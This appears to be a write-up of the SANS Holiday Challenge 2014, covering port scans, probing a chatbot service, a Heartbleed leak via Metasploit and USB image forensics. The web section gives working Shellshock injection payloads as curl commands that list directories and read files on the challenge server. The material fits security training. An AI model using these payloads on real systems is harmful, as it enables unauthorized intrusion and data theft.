Upload
lydung
View
221
Download
3
Embed Size (px)
Citation preview
SANS Holiday Challenge 2014 A Christmas Hacking Carol
James Herubin - January 4, 2015
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �1
1. Introduction 3
1.1: Setup 3
1.2: Tool Details 3
2. BLUF (Bottom Line Up Front) - Secrets Revealed 4
2.1: System at 173.255.233.59 4
2.2: Website 4
2.3: USB File System Image 4
2.4: Order of Completion 5
3. Ghost of Hacking Past 6
3.1: Nmap Scans 6
3.2: Telnet Sessions with Eliza 8
3.3: Response Discovery 8
3.4: Eliza’s Secret 10
4. Ghost of Hacking Present 13
4.1: Vulnerability Scan 13
4.2: Website Secret #1 14
4.3: Shellshock…maybe? 15
4.4: Website Secret #2 16
4.5: Strange Behavior 17
5. Ghost of Hacking Future 19
5.1: Preparation 19
5.2: USB Secret #1 21
5.3: USB Secret #2 22
5.4: USB Secret #3 23
5.5: USB Secret #4 26
6. Summary 29
Appendix A: Eliza Log File 30
Appendix B: Website Secret #2 - Metasploit Output 35
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �2
1. Introduction
1.1: Setup
After reading through the challenge and taking a look at what was presented I set up my Macbook Air with VMs of Kali Linux and the SANS Investigative Forensic Toolkit (SIFT) Workstation.
1.2: Tool Details
A list of the tools that were used to complete the challenge are shown here.
Macbook Air• VMware Fusion - For running Linux distributions.• Evernote - For keeping track of the copious notes throughout the challenge.• Wireshark - For traffic and pcap analysis.• python - Scripts and SimpleHTTPServer.
Kali Linux 1.09a• Metasploit - Pen testing.• OpenVAS - Vulnerability scanner.• fcrackzip - Zip file password cracker.• exiftool - For reading file metadata.• cURL - For retrieving information from the web server.
SANS Investigative Forensic Toolkit (SIFT) Workstation Version 3.0• srch_strings - General use string searching.• log2timeline - Filesystem timeline analysis.• l2t_process - Timeline sorting.• blkls - For extraction of unallocated disk space and slack space.• foremost - File carving utility.• bulk_extractor - Extracting useful info from the disk image.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �3
2. BLUF (Bottom Line Up Front) - Secrets RevealedBefore diving into the details of how I found the answers here is a list of the questions asked during the challenge along with the secrets that were found.
2.1: System at 173.255.233.59
What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?
• Eliza Secret: “Machines take me by surprise with great frequency. -Alan Turing”
2.2: Website
What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website?
• Website Secret #1: Hacking can be noble.• Website Secret #2: Use your skills for good.
2.3: USB File System Image
What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future?
• USB Secret #1: Your demise is a source of mirth.• USB Secret #2: Your demise is a source of relief.• USB Secret #3: Your demise is a source of gain for others.• USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil
or greed.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �4
2.4: Order of Completion
It should be noted that I am writing this report in the order that the challenge was presented. However, my actual completion was not a linear process. The order of completion was:
• USB Secret #1• USB Secret #2• USB Secret #4• Website Secret #1• USB Secret #3• Website Secret #2• Eliza Secret
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �5
3. Ghost of Hacking Past
3.1: Nmap Scans
The first scan I ran was a full TCP scan which produced the following results.
The next scan was a UDP scan.
We see something that might need further investigation on TCP port 31124. Before doing so I ran a service version scan that reveals we have a very chatty service on TCP port 31124 and her name is Eliza.
root@kali:~# nmap -p- -sS 173.255.233.59
Starting Nmap 6.40 ( http://nmap.org ) at 2015-01-02 23:13 ESTNmap scan report for li243-59.members.linode.com (173.255.233.59)Host is up (0.024s latency).Not shown: 65532 closed portsPORT STATE SERVICE22/tcp open ssh25/tcp filtered smtp31124/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 39.38 seconds
root@kali:~# nmap -sU -p- 173.255.233.59
Starting Nmap 6.40 ( http://nmap.org ) at 2014-12-26 23:28 ESTNmap scan report for li243-59.members.linode.com (173.255.233.59)Host is up (0.00031s latency).Not shown: 65534 open|filtered portsPORT STATE SERVICE123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 158.56 seconds
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �6
root@kali:~# nmap -p- -sV 173.255.233.59
Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-26 23:37 ESTNmap scan report for li243-59.members.linode.com (173.255.233.59)Host is up (0.021s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)25/tcp filtered smtp31124/tcp open unknown1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :SF-Port31124-TCP:V=6.40%I=7%D=1/2%Time=54A76CCC%P=x86_64-unknown-linux-gnuSF:%r(NULL,24,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>SF:\x20")%r(GenericLines,26,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUSF:R\x20MIND\?\n>\x20>\x20")%r(GetRequest,3A,"I\x20AM\x20ELIZA\.\x20\x20WHSF:AT'S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUFFED\?\n>\x20")%SF:r(HTTPOptions,36,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MINSF:D\?\n>\x20PLEASE\x20CONTINUE\n>\x20")%r(RTSPRequest,4B,"I\x20AM\x20ELIZSF:A\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20I\x20AM\x20NOT\x20SURE\SF:x20I\x20UNDERSTAND\x20YOU\x20FULLY\n>\x20")%r(RPCCheck,3A,"I\x20AM\x20ESF:LIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUSF:FFED\?\n>\x20")%r(DNSVersionBindReq,3A,"I\x20AM\x20ELIZA\.\x20\x20WHAT'SF:S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUFFED\?\n>\x20")%r(DSF:NSStatusRequest,26,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MSF:IND\?\n>\x20>\x20")%r(Help,36,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\xSF:20YOUR\x20MIND\?\n>\x20PLEASE\x20CONTINUE\n>\x20")%r(SSLSessionReq,47,"SF:I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20YOU'RE\xSF:20BEING\x20A\x20BIT\x20WOOLY\x20WITH\x20ME\n>\x20")%r(Kerberos,3B,"I\x2SF:0AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20BASH\x20ON\xSF:20WITH\x20IT\x20THEN\n>\x20")%r(SMBProgNeg,52,"I\x20AM\x20ELIZA\.\x20\xSF:20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20HAVE\x20OTHER\x20PEOPLE\x20SAID\SF:x20THAT\x20YOU\x20ARE\x20STODGY\?\n>\x20")%r(X11Probe,3A,"I\x20AM\x20ELSF:IZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20ARE\x20YOU\x20DISCHUFSF:FED\?\n>\x20")%r(FourOhFourRequest,40,"I\x20AM\x20ELIZA\.\x20\x20WHAT'SSF:\x20ON\x20YOUR\x20MIND\?\n>\x20THAT\x20SOUNDS\x20LIKE\x20A\x20DODDLE\n>SF:\x20")%r(LPDString,3B,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\xSF:20MIND\?\n>\x20BASH\x20ON\x20WITH\x20IT\x20THEN\n>\x20")%r(LDAPBindReq,SF:59,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ON\x20YOUR\x20MIND\?\n>\x20I\x2SF:0DON'T\x20MEAN\x20TO\x20RUSH\x20YOU,\x20BUT\x20COULD\x20YOU\x20CHIVVY\xSF:20ON\?\n>\x20")%r(SIPOptions,45,"I\x20AM\x20ELIZA\.\x20\x20WHAT'S\x20ONSF:\x20YOUR\x20MIND\?\n>\x20WHAT\x20DOES\x20THAT\x20SUGGEST\x20TO\x20YOU\?SF:\n>\x20");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelNmap done: 1 IP address (1 host up) scanned in 231.88 seconds
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �7
3.2: Telnet Sessions with Eliza
When you connect to Eliza through netcat or telnet on port 31124 she will respond to questions you ask. It becomes obvious that there are basic random responses and other responses that correspond to key words she is picking up. One example is the word “secret” as seen here.
3.3: Response Discovery
Interacting with Eliza was a slow and tedious process and I wanted to discover additional responses that I may not have encountered. I had a wordlist file that I created to discover USB Secret #3 so I wrote a little python script that would throw that list at Eliza and keep track of her unique responses.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �8
This method allowed me to send over 7000 words to Eliza in under 5 minutes. You can see the log file of this interaction in Appendix A.
Some key revelations after this was complete include:
• Non-standard (or less random) responses to some word like: challenge, link and turing.• Some responses ‘progressed’ if the word was used multiple times. One example is the
word “link” which had these responses:• I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.• I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?• YOU SEEM LIKE A NICE PERSON. I THINK I CAN TRUST THE LINKS YOU SEND
ME.• The word “challenge” also revealed this:
• I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �9
I then spent a loooooooooong time trying to send Eliza links in hopes of generating a desired response. Eventually I found that by repeating (six times) the “SURF TO” phrase found in the response above along with a valid URL Eliza would connect to the site.
3.4: Eliza’s Secret
Since Eliza was connecting to links I sent to her I needed to send her a link that would allow her to connect back to my network. This would allow me to see what kind of traffic she was generating. I already had a dynamic DNS service for my home network so I just forwarded TCP port 80 to port 8000 on my Macbook.
I started up an instance of SimpleHTTPServer on port 8000.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �10
Started up Wireshark and filtered on Eliza’s IP address.
I then told her to surf to my address.
In Wireshark we can see my request to Eliza.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �11
4. Ghost of Hacking Present
4.1: Vulnerability Scan
The first thing I did for the website was run a vulnerability scan using OpenVAS from Kali. You do this by selecting: Applications —> Kali Linux —> Vulnerability Analysis —> OpenVAS —> openvas start
After the scan was complete the report revealed that this server has a couple of high vulnerabilities.
A closer look indicated that the server is susceptible to the heartbleed vulnerability.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �13
4.2: Website Secret #1
I then turned to Metasploit to see if we can explore this bit further.
In Kali you can start Metasploit from the command line by entering msfconsole or from the menu using Applications —> Kali Linux —> Exploitation Tools —> Metasploit —> metasploit framework
Do a search for heartbleed.
We see two results.
We can see the description of the first module by entering.
msf > search heartbleed
msf > use auxiliary/scanner/ssl/openssl_heartbleedmsf auxiliary(openssl_heartbleed) > info
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �14
Let’s give it a try. Set the web server’s IP address and run the exploit.
Here is a snippet of the Metasploit output revealing Website Secret #1. See Appendix B for the full output.
We can pretty much read the secret in that output but let’s run it through a URL decoder.
4.3: Shellshock…maybe?
For the next secret I decided to go with what knew about the site pages and also play off a hint that the Ghost of Hacking Present provided.
Looking at the source code of the contact.html web page we can see that there is a submit.sh file in the cgi-bin folder.
msf auxiliary(openssl_heartbleed) > set RHOSTS 23.239.15.124RHOSTS => 23.239.15.124msf auxiliary(openssl_heartbleed) > run
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �15
The Ghost also told us that “Those secrets should shock your heart, teaching you important lessons for all time.” We already found the heartbleed so now let’s go after shellshock.
4.4: Website Secret #2
Using curl I started with the following command.
Interesting…if you notice the first line in the output tells us we are in the /var/www/cgi-bin directory. Let’s see if we can traverse directories.
Good. It looks like we are the root of the filesystem. Let’s see if we can list out the contents of that directory.
root@kali:~# curl http://23.239.15.124/cgi-bin/submit.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; pwd"/var/www/cgi-binContent-Type: text/html
<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
root@kali:~# curl http://23.239.15.124/cgi-bin/submit.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; cd ../../../etc/.. ; pwd"/Content-Type: text/html
<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
root@kali:~# curl http://23.239.15.124/cgi-bin/submit.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; echo /*"/bin /dev /etc /lib /lib64 /run /sbin /secret /selinux /usr /varContent-Type: text/html
<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �16
We can now see that have something called /secret in the root directory. After trying to cd into that directory failed I suspected that this may be a file. I quickly realized that simple commands like ls did not work with this type of vulnerability. Instead you must use bash builtin commands. One of these commands is “read” and you have the option to get a single line using the -r switch. After fumbling through the syntax I finally got this to work and found Website Secret #2.
4.5: Strange Behavior
I found one other bit of strange behavior on the server. By leaving the .sh off of the submit.sh filename you can navigate to http://www.scrooge-and-marley.com/cgi-bin/submit and see what looks like the possible contents of submit.sh. Maybe this is a backup copy of the file or a configuration problem?
root@kali:~# curl -A '() { :; }; echo; read -r line </secret; echo $line' http://23.239.15.124/cgi-bin/submit.shWebsite Secret #2: Use your skills for good.Content-Type: text/html
<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �17
I wanted to see if it was another file. I tried to use the method above to get the first line of the “submit” file and got no results.
Here the test does work against the known “submit.sh” file.
With that said I am not sure what that behavior indicates.
root@kali:~/test# curl -A '() { :; }; echo; read -r line </var/www/cgi-bin/submit; echo $line' http://23.239.15.124/cgi-bin/submit.sh <— No Info - submit not a file ???Content-Type: text/html
<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
root@kali:~/test# curl -A '() { :; }; echo; read -r line </var/www/cgi-bin/submit.sh; echo $line' http://23.239.15.124/cgi-bin/submit.sh#!/bin/bash <— Correct first line from submit.shContent-Type: text/html
<html><head><style type="text/css"> body { background-color: #E9DD09; } </style><META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/"></head></html>
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �18
5. Ghost of Hacking Future
5.1: Preparation
After downloading the USB image I started to set up my SIFT Workstation to begin analysis. I mounted the image read-only.
…and then set up a work area under cases.
I started out with a basic string search against the image file.
Using log2timeline and l2t_process I created a super timeline of the image.
I then ran bulk_extractor to see if we get anything else of interest.
Finally, I used foremost and blkls from The Sleuth Kit to carve out anything that may be in unallocated space and slack space.
root@siftworkstation:~# mount -o loop,ro,show_sys_files,streams_interface=windows hhusb.dd.bin /mnt/windows_mount
root@siftworkstation:/home/sansforensics# srch_strings hhusb.dd.bin > srchstrings.txt
root@siftworkstation:~# log2timeline -r -p -z EST5EDT /mnt/windows_mount -w timeline.csv
root@siftworkstation:~# l2t_process -b timeline.csv > super_timeline.csv
root@siftworkstation:~# bulk_extractor -e net -e aes -o /cases/HackingFuture/be/ hhusb.dd.bin
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �19
When all that is complete I end up with a browsable mount point of the original USB image…
root@siftworkstation:~# blkls hhusb.dd.bin > /cases/HackingFuture/unallocated_imagefile.blkls
root@siftworkstation:~# blkls -s hhusb.dd.bin > /cases/HackingFuture/slack_imagefile.blkls
root@siftworkstation:~# mkdir /cases/HackingFuture/unallocated
root@siftworkstation:~# foremost -o /cases/HackingFuture/ /cases/HackingFuture/unallocated/unallocated_imagefile.blkls
root@siftworkstation:~# foremost -o /cases/HackingFuture/unallocated /cases/HackingFuture/unallocated_imagefile.blkls
root@siftworkstation:~# mkdir /cases/HackingFuture/slack
root@siftworkstation:~# foremost -o /cases/HackingFuture/slack /cases/HackingFuture/slack_imagefile.blkls
root@siftworkstation:~# foremost -o /cases/HackingFuture/unallocated /cases/HackingFuture/unallocated_imagefile.blkls
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �20
…and some other potentially interesting stuff.
5.2: USB Secret #1
In the srch_strings output file I looked for the word “secret”. Bingo…there is USB Secret #1.
I wanted to find the actual location of this secret. The context around the srch_strings results indicate it may be in a Word document. At the root of the mount point of the USB image there is a Word document named LetterFromJackToChuck.doc. If we look at the properties of the document we can find the following in the Custom Properties tab.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �21
5.3: USB Secret #2
Another thing I like to do with string searches is to look for things like Base64 encoding. Although a Base64 encoded string does not always end in “=“ or “==“ I still like to look for those endings to see if I get lucky. A search for “==“ in the srch_strings output file revealed the following.
Running that through a Base64 decoder reveals USB Secret #2.
Once again I wanted to find the actual location of this secret. The context around this one indicated that it was part of a captured chat conversation so I took a look at the pcap file named h2014-chat.pcapng. I opened the file in Wireshark and looked for the string “I so love you”. The packet that contained this string has a comment annotated that contains the Base64 encoded string.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �22
5.4: USB Secret #3
Foremost carved out a .zip file from the image. When I tried to access the contents I was prompted for a password.
I then tried brute forcing the password using fcrackzip. After letting that run for most of the day I realized that there had to be a better way. I went out on a limb looking for clues in the challenge site as well as the Scrooge and Marley site. I wrote a small python script to extract all the words in the source code of these two sites.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �23
I then took that wordlist and used it to find the password with fcrackzip. Success…password is “shambolic”.
That password was found on the Scrooge and Marley site in a comment near the top of the file.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �24
Inside the .zip file was this image named Bed_Curtains.png.
I ran exiftool on this image to reveal USB Secret #3.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �25
5.5: USB Secret #4
While looking at the super timeline that was created we see that there was a deleted file named Tiny_Tom_Crutches_Final.jpg.
In our preparation for this portion of the challenge foremost recovered this image from unallocated space. The full size version of the image is used on the cover page of this report.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �26
I didn’t find anything in the image so if there was a secret in this one I suspected that steganography may have been used. While doing some further investigation I decided to take a look to see what bulk_extractor may have found. In the url_histogram I found a URL outlier that indicated the owner of the USB drive visited a link to a steganography tool.
I downloaded the steganography tool and ran it against the image.
root@siftworkstation:/home/sansforensics# java -jar Downloads/f5.jar x -e out.txt Desktop/cases/HackingFuture/unallocated/jpg/00001536.jpgHuffman decoding startsPermutation starts423168 indices shuffledExtraction startsLength of embedded file: 116 bytes(1, 127, 7) code used
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �27
Upon checking the output file I found that USB Secret #4 was revealed.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �28
6. SummaryWell there you have my submission to this year’s challenge.
The two secrets that took most of my time were Eliza and Web Secret #2.
I have to give recognition to my friend Fred for the amount of time put in on Web Secret #2. I was well into the challenge with 5 of 7 secrets complete before traveling from NOVA to Metro Detroit for Christmas. While spending the holiday at his house I got him interested in the challenge. Web Secret #2 had us up until 4am on Christmas trying various versions of the syntax to get the secret. Our wives thought we were nuts but a couple of 7 year olds introduced them to Subway Surfers on their phones so they were content/hooked and stayed up with us until our Mac batteries died.
The next day we continued to hammer away on the proper syntax to use for this approach. We knew what we were going after while trying the various permutations and eventually the /secret file found at the root of the web server’s file system was revealed. This challenge became an addiction and I guess I should apologize to the family on SANS behalf for ruining the holiday. :)
Now that this is over here is the tweet I sent out on New Years Day:
I want to thank the SANS team that put this exercise together. I understand that a lot of time and effort goes into creating these challenges and I believe you all did an outstanding job with it. I really enjoyed the variety of this challenge and how it allowed me to use a wide range of skills and tools. I am looking forward to the next one.
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �29
Appendix A: Eliza Log FileThis is the automated log file from my python script showing Eliza’s unique responses and the words that triggered the response.
I AM ELIZA. WHAT'S ON YOUR MIND?> doctype
PLEASE CONTINUE> html
ARE YOU NORMALLY SO SHAMBOLIC?> public
I DON'T MEAN TO RUSH YOU, BUT COULD YOU CHIVVY ON?> w
GO ON> dtd
THAT SOUNDS LIKE A DODDLE> transitional
ARE YOU DISCHUFFED?> en
BRILLIANT> http
HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?> www
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �30
BASH ON WITH IT THEN> tr
YOU'RE BEING A BIT WOOLY WITH ME> dtd
WHAT DOES THAT SUGGEST TO YOU?> dtd
WOULD YOU SAY YOU WERE HAVING KITTENS OVER IT?> conditional
I AM NOT SURE I UNDERSTAND YOU FULLY> stylesheets
KEEN> if
WHAT DO YOU THINK ABOUT?> ie
THAT ISN'T BLINDING, IS IT?> no
WHY NOT?> ie
DO YOU NORMALLY NATTER ON LIKE THAT?> if
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �31
DO YOU WISH THAT?> ie
VERY INTERESTING> no
ARE YOU SAYING 'NO' JUST TO BE NEGATIVE?> if
DO YOU REALLY THINK IT'S LIKELY THAT?> no
YOU ARE BEING A BIT NEGATIVE.> name
I AM NOT INTERESTED IN NAMES> challenge
A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?> link
I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.> challenge
YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.> link
I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �32
> link
YOU SEEM LIKE A NICE PERSON. I THINK I CAN TRUST THE LINKS YOU SEND ME.> '
> challenge
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?> am
WHY DO YOU SAY 'AM?'> because
IS THAT THE REAL REASON?> am
I DON'T UNDERSTAND THAT> if
REALLY--IF?> what
WHAT IS IT YOU REALLY WANT TO KNOW?> turing
DR. TURING? I THINK OF HIM AS A DEAR FATHER, AND I AM DEEPLY PROUD OF HIS WORK.>
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �33
someone
CAN YOU BE MORE SPECIFIC?> yes
I UNDERSTAND> what
WHAT COMES TO YOUR MIND WHEN YOU ASK THAT?> because
WHAT OTHER REASONS MIGHT THERE BE?> always
CAN YOU THINK OF A SPECIFIC EXAMPLE?> what
WHY DO YOU ASK?> what
DOES THAT QUESTION INTEREST YOU?>
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �34
Appendix B: Website Secret #2 - Metasploit OutputThe secret is highlighted in the output below.
msf auxiliary(openssl_heartbleed) > run
[*] 23.239.15.124:443 - Sending Client Hello...[!] SSL record #1:[!] Type: 22[!] Version: 0x0301[!] Length: 86[!] Handshake #1:[!] Length: 82[!] Type: Server Hello (2)[!] Server Hello Version: 0x0301[!] Server Hello random data: 5494c305b0b7e7c56c1af10ae143798b7e24545d1a4d3fef39f80f61bcab4962[!] Server Hello Session ID length: 32[!] Server Hello Session ID: 1179c7915bd1ad5550bd974caa909e427f506cb3d0e10a667cddd197842532fc[!] SSL record #2:[!] Type: 22[!] Version: 0x0301[!] Length: 584[!] Handshake #1:[!] Length: 580[!] Type: Certificate Data (11)[!] Certificates length: 577[!] Data length: 580[!] Certificate #1:[!] Certificate #1: Length: 574[!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>[!] SSL record #3:[!] Type: 22[!] Version: 0x0301[!] Length: 397[!] Handshake #1:[!] Length: 393
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �35
[!] Type: Server Key Exchange (12)[!] SSL record #4:[!] Type: 22[!] Version: 0x0301[!] Length: 4[!] Handshake #1:[!] Length: 0[!] Type: Server Hello Done (14)[*] 23.239.15.124:443 - Sending Client Hello...[!] SSL record #1:[!] Type: 22[!] Version: 0x0301[!] Length: 86[!] Handshake #1:[!] Length: 82[!] Type: Server Hello (2)[!] Server Hello Version: 0x0301[!] Server Hello random data: 5494c30f77d3dc41fb7f94861c1ecc1dedc3b0eee33a08642cbdb931ba06b71e[!] Server Hello Session ID length: 32[!] Server Hello Session ID: 635e1fd4a117449ded6a77aef2d8f3f4c8983b6d0e2c34415b68ff05b7f4406d[!] SSL record #2:[!] Type: 22[!] Version: 0x0301[!] Length: 584[!] Handshake #1:[!] Length: 580[!] Type: Certificate Data (11)[!] Certificates length: 577[!] Data length: 580[!] Certificate #1:[!] Certificate #1: Length: 574[!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>[!] SSL record #3:[!] Type: 22[!] Version: 0x0301
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �36
[!] Length: 397[!] Handshake #1:[!] Length: 393[!] Type: Server Key Exchange (12)[!] SSL record #4:[!] Type: 22[!] Version: 0x0301[!] Length: 4[!] Handshake #1:[!] Length: 0[!] Type: Server Hello Done (14)[*] 23.239.15.124:443 - Sending Heartbeat...[*] 23.239.15.124:443 - Heartbeat response, 65535 bytes[+] 23.239.15.124:443 - Heartbeat response with leak[*] 23.239.15.124:443 - Printable info leaked: T~V4<Dpf"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e,]S4W60f(7`@@a@}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!FB9#SNcf!nIg!kwP[Qc/,87!"RI(N6;yf+eO#<EL-HJ]#0*zZxs&yhX]A'k+"qq!k\{jMYnuW_}_:ygq6Z25hi 0E=pYZ+#a'u0rN}6uf<"]LtdXV"o0^v=)5)0U00*HO]9Td6HY9cgzC)-TR>Xp04gUK]hiL[viO`GiuTKTfn+Q/:TZSZumUx_'[$@CFoioA(S\~G*H"q&<'U_Tg,%0)fH'Y]d@&^UF?HIJMr*V9/Fa3Pn/0~$Yk%A5\0\up?OcG`JO51DYdOQNJNdO<JSg~)v{6W'XdgZ/g:sO>r}sEA]f|i{=CamW2[ZSehM>i#O6*CUlAode{dl.bi|J3*NH"d`MDHY%nwXZ:l#BVGB!SRm8=H]3F<*W @dfMb`SknaSYy)+L0p>TST7WENY`JPx4RvzSyn5]X{{!`b}5+x%^YldtiHW\3n9Y3`|r}+@&y8N%-"xM ,]83zjw{[{ &R$SW[|[l].,ctW[E#zyta06aPxpg;Ip_,1mw(qNA'?+W[F'_7<hp{TM2A<:BRZAu!<N=PO-H7IG^mm1OJe}pkEN[CR3|6)tCT$K!>'Uv3]*)YbEu<8k}MLmLp(k{M'5KEAa:Y^SS!FqJ}xEd\!fx2MjB0;J h:b[8SpPWcF0sebw[}/va2`$&E4@,|5{I#\U\B,0IFO)`tK&]zgU4O<kV@)4<iw$fOV3E^6}_hqWM}|me_D_U OxyQ5(&#A
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �37
